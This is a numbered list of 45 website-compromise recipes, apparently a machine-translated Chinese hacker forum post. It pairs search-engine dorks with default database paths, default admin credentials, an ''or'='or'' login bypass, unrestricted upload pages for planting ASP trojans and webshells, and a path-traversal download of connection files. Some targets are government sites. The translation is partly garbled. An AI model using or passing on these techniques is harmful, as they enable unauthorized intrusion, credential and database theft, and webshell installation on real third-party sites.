1,
Gå till GoogLe, sök efter några nyckelord, edit.asp? Det finns många koreanska broiler, de flesta är MSSQL-databaser!
2,
Gå till Google, site:cq.cn inurl:asp
3,
Använd grävhöna och en ASP-trojan.
Filnamnet är login.asp
Pathgruppen är /manage/
Nyckelordet är went.asp
Använd 'eller' = 'eller' för att landa
4,
Nyckelord: Co Net MIB Ver 1.0 Webbplatsbakgrundshanteringssystem
Kontolösenordet är 'eller'='eller'
5.
Dynamiskt köpsystem
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp och upLoad_c1.asp är två slumpmässiga val, och de flesta administratörer ignorerar dessa två sårbarheter
6。
Standarddatabasadressen är blogdata/acblog.asa
Nyckelord: acblog
7.
Baidu /htdocs
Du kan ladda upp ASA-filer direkt i registreringen!
8.
/Database/#newasp.mdb
Nyckelord: NewAsp SiteManageSystem Version
9.
Med en grävare
Nyckelord: Drivs av WEBBOY
Sida: /upfile.asp
10.
Sök efter nyckelordet Ver5.0 Build 0519 i baidu
(Det finns en sårbarhet för uppladdning)
11.
Upfile_Article.asp bbs/upfile.asp
Ange nyckelord: powered by mypower ,
12.
inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站
13.
Nu söker GOOGLE efter nyckelordet intitle:website assistant inurl:asp
14.
Nyckelord: Hem Senaste nyheter Nybörjarguide Dansmusik Nedladdningscenter Klassiska artiklar Spelarstil Utrustning Köpsajt Rykten Vänskapskontakt Denna sida forum
Kolla upp nyckelordet kyckling Tim setup.asp
15.
Databas över VBulletin-forumet
Standardadress i databasen!
/includes/functions.php
Verktyg:
1. Webbplatsjägare Nedladdningsadress: Baidu Google!
2.Google
Nyckelord:
Drivs av: vBulletin Version 3.0.1
Drivs av: vBulletin Version 3.0.2
Drivs av: vBulletin Version 3.0.3
En av dem duger
16.
1. Öppna Baidu eller GOOGLE-sökning och ange drivet av comersus ASP kundvagn
öppen källkod。 Det här är ett köpcentrumsystem.
2. Längst ner på webbplatsen finns en Comersus Open Technologies LC. Öppna den och se ~~comersus-systemet~
Gissa comersus.mdb. är databasens namn
Databasen placeras efter databas/,
Så databas/comersus.mdb
comersus_listCategoriesTree.asp ändrat till databas/comersus.mdb och kan inte laddas ner.
Ta sedan bort den tidigare butiken och lägg till databas/comersus.mdb för att prova
17.
Oroarfri Legend officiella webbplatsprogram.
1. Bakgrundshanteringsadress: http:// ditt domännamn /msmiradmin/
2. Standard bakgrundshanteringskonto: msmir
3. Standard bakgrundshanteringslösenord: msmirmsmir
Databasfilen är http:// ditt domännamn /msmirdata/msmirArticle.mdb
Databasanslutningsfilen är ***********/Conn.asp
18.
Skriv /skins/default/ i Baidu.
19.
Använd grävmaskiner
Kritisk mekanism: kraft från Discuz
Väg: /wish.php
Samarbete:
Discuz! forum wish.php användning av sårbarhetsverktyg för fjärrinkludering
20.
Ladda upp sårbarheter.
Verktyg: Domän3.5
Website Hunter version 1.5
Nyckelord drivet av mypower
Upptäckta sidor eller filer infogas i upfile_photo.asp
21.
Nya molnsårbarheter
Denna sårbarhet är en universallösning för ACCESS och SQL.
Google-sök på nyckelord "Om denna sida - Webbplats Hjälp - Reklamsamarbete - Ladda ner uttalande - Vänskapsanslutning - Sitemap - Hantera inloggning"
Flash/downfile.asp?url=uploadfile/: /.. /conn.asp commit till siterooten. Du kan ladda ner conn.asp
De flesta är källkods-, mjukvaru- osv. nedladdningsstationer.
Du stöter ofta på att om databasen är + längst fram eller i mitten, kan # ersättas med %23 för nedladdning
\databas\%23newasp.mdb
För example:#xzws.mdb ändring till %23xzws.mdb
22.
Alla äter alla köpcentrum + strömladdningssystem
Verktyg som användes: Dig Chicken v1.1 Ming Boy
Marknadsplats**:
Nyckelord: Shopping->Lägg i kundvagn->Gå till kassan->Bekräfta mottagarens information-> betalningsmetod-> leveransmetod-> betala online eller betala pengar efter att ha lagt en beställning-> kvittering av betalningen->leverans-> slutfört- slutfört-
Sårbarhetssida :upload.asp
upfile_flash.asp
Kraft**:
Nyckelord: driven av mypower
Sårbarhetssidan :upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
Injicera sårbarheter
Baidu söker på iojs blogg
24
Rörelsen är enkel
Kolumnförteckning
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
Verktyg: Website Hunter
Keywords:inurl:Went.asp
Suffix: hantera/login.asp
Lösenord: 'eller'='eller'
26.
**Warcraft Private Server
Verktyg behövs: En ASP-trojan.
Domän 3.5 Ming Kid
Nyckelord: Rättigheter förbehållna Design: Game Alliance
Bakgrundsadress: admin/login.asp
Databasens adress: chngame/#chngame.mdb
27.
Sårbarheten är ett misstag som utnyttjar administratörens IIS-inställningar
Att använda baidu-nyckelord är ett relativt ovanligt skriptnamn
Flyttande nätverk: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
Sats: admin_articlerecyclebin.asp
28.
Databasexplosionssårbarheter hos utländska stationer
Nyckelord: sorglig Ravens gästbok
Lösenordsadress: /passwd.dat
Bakgrundsadress: /admin.php
29.
Discuz 4.1.0 sårbarhet över sajter
Använd verktyg: 1. WAP-webbläsare
2. WAP-kodningsomvandlare
Nyckelord: "intextiscuz!" 4.1.0"
30.
Nyckelord: Shanks
bakgrundsväg /system/manage.asp
Överför ASP-trojaner direkt
31.
Verktyg
1: Webbplatsjägare
2: Malaysia
Nyckelord: Stäng inte av cookies, annars kan du inte logga in
Sätt in diy.asp
32.
Nyckelord: Team5 Studio Alla rättigheter förbehållna
Standarddatabas: data/team.mdb
33.
Verktyg: Excavator Fuchen Database Reader
Nyckelord: Företagsprofil Produktvisning Produktlista
Tillägg: /database/myszw.mdb
Bakgrundsadress: admin/Login.asp
34.
Nyckel sub-XXX inurl:Nclass.asp
Skriv en trojan i "Systeminställningar".
kommer att räddas till config.asp.
35.
Om du inte går in i bakgrunden använder du ändå WEBSHELL:n
data.asp?action=BackupData Standardsökvägen för databasbackupen
36.
Verktyg: WebShell för webbplatsjakt
Keywords:inurl:Went.asp
Suffix: hantera/login.asp
Svagt lösenord: 'eller'='eller'
37.
Nyckelord: oered byCDN_NEWS
Skanna artikeln och lägg till en ' för att testa injektionspunkten
Backend-adressen :admin_index.asp
38.
**Thunder Pool pressmeddelandesystem
Nyckelord: leichinews
Ta bort den efter leichinews.
Tagg: admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
Ladda sedan upp hästen.....
Besök Uppic anran.asp Landing Horse.
39.
Nyckelord: ower System Of Article Management Ver 3.0 Build 20030628
Standarddatabas: database\yiuwekdsodksldfslwifds.mdb
Bakgrundsadress: Scanna dig själv!
40.
1. Hitta ett stort antal injektionspunkter via GOOGLE-sökning
Nyckelord: asp?id=1 gov.jp/ asp?id=
Antal sidor: 100
Språk: Fyll i vilket språk du vill **
41.
Nyckelord: Drivs av:94KKBBS 2005
Använd lösenordsåterställningsfunktionen för att hämta administratören
Fråga: ddddd Svar: dddddd
42.
Keywords:inurl:Went.asp
Bakgrunden är ledare/login.asp
Bakgrundslösenord: 'eller'=' eller 'eller'='eller' Logga in för att komma in
Standarddatabasadressen är atabase/DataShop.mdb
43.
Nyckelord: ****** inurl:readnews.asp
Ändra den sista/till 5 %, exponera databasen direkt, titta på lösenordet och ange bakgrunden
Lägg bara till en nyhet. Skriv in vår mening Trojan i titeln.
44.
Verktyg: En trojansk häst
BBsXp 5.0 sp1 admin gissningsverktyg
Nyckelord: drivs av bbsxp5.00
Gå in i bakgrunden och backa en mening!
45.
Nyckelord: Programkärna: BJXSHOP expert på öppning av nätbutiker
Bakgrund: /admin
|
Publicerad på 2014-12-22 23:11:20
|
|
|
Publicerad på 2017-07-20 06:57:43
|
